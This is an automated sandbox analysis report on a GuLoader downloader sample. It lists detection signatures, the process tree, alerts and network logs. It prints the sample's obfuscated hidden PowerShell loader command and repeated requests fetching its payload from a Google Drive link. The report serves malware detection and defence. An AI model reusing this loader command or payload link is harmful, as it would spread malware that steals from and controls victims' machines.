Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AwMu7gR48D.exe

Overview

General Information

Sample name:AwMu7gR48D.exe
renamed because original name is a hash value
Original sample name:6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287.exe
Analysis ID:1567521
MD5:e910dd39a106dfb09f31945608899357
SHA1:3c769e1093522daf75c7425413a5d44dd3f29f7f
SHA256:6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AwMu7gR48D.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\AwMu7gR48D.exe" MD5: E910DD39A106DFB09F31945608899357)
    • powershell.exe (PID: 6076 cmdline: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 4516 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.1861341380.000000000A4CF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.2675534905.0000000004C8F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 172.217.19.174, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4516, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6076, TargetFilename: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)", CommandLine: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AwMu7gR48D.exe", ParentImage: C:\Users\user\Desktop\AwMu7gR48D.exe, ParentProcessId: 1992, ParentProcessName: AwMu7gR48D.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)", ProcessId: 6076, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T16:43:50.010223+010028032702Potentially Bad Traffic192.168.2.949709172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: AwMu7gR48D.exeAvira: detected
      Source: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exeAvira: detection malicious, Label: TR/Injector.qhjhe
      Source: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exeReversingLabs: Detection: 57%
      Source: AwMu7gR48D.exeReversingLabs: Detection: 57%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: AwMu7gR48D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49738 version: TLS 1.2
      Source: AwMu7gR48D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_00406232 FindFirstFileA,FindClose,0_2_00406232
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004056F7
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\userJump to behavior
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
